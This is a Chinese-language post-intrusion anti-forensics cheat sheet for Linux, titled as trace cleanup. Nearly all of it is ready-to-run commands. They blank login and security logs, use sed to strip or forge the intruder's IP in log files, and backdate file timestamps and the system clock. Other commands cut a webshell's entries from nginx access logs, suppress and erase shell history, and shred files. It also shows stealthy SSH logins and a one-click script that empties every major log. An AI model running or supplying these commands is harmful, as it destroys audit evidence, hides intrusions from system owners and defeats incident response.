痕迹清理-Linux篇

登录痕迹清理

基本的日志结构

/var/log/btmp 记录所有登录失败信息，使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志，使用lastlog命令查看
/var/log/wtmp 记录所有用户的登录、注销信息，使用last命令查看
/var/log/utmp 记录当前已经登录的用户信息，使用w,who,users等命令查看
/var/log/secure 记录与安全相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志

清除日志

# lastb
echo > /var/log/btmp
# last
echo > /var/log/wtmp
# 清除用户最后一次登录时间
echo > /var/log/lastlog 
# 清除安全日志记录
cat /dev/null > /var/log/secure
# 清除系统日志记录
cat /dev/null > /var/log/secure
# 清除当前登录用户的信息
echo > /var/log/utmp 

删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip

sed -i '/自己的ip/'d /var/log/messages

全局替换自己ip

sed -i 's/192.168.166.85/192.168.1.1/g' secure

前面是待替换ip 后面为替换后的ip

时间痕迹清理

ls -al 可以查看创建时间

touch

touch -r 目标时间的文件 需要修改时间的文件
touch -d "2018-04-18 08:00:00" Th1s_isnot_flag.txt
-a ： 仅修改access time
-c ：仅修改时间，而不建立文件
-d ：后面可以接日期，也可以使用 --date="日期或时间"
-m ：仅修改mtime
-t ：后面可以接时间，格式为 [YYMMDDhhmm]

date

date -s 20140712 18:30:50 将当前系统日期修改为2014年07月12 18:30:50

hwclock

hwclock --hctosys # --hctosys 将系统时钟调整为与目前的硬件时钟一致。

操作痕迹清理

服务日志修改

# 使用grep -v来把我们的相关信息删除,

cat /var/log/nginx/access.log | grep -v evil.php > tmp.log

# 把修改过的日志覆盖到原日志文件

cat tmp.log > /var/log/nginx/access.log/

history记录清理

• 登录ssh后不记录history

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null;export HISTSIZE=0; export HISTFILESIZE=0

• 清理 ~/.bash_history
• history -c
• vim /etc/profile 修改 HISTSIZE=0

文件覆写

• 单文件

shred -f -u -z -v -n 8 1.txt

• 文件夹

wipe -r

隐藏ssh登录记录

ssh -T root@192.168.0.1 /bin/bash -i

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

-o UserKnownHostsFile=/dev/null #这个是knowhost的信息及公钥

-T user@host /bin/bash –i #不分配伪终端但是给个bash的终端

一键清除脚本

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c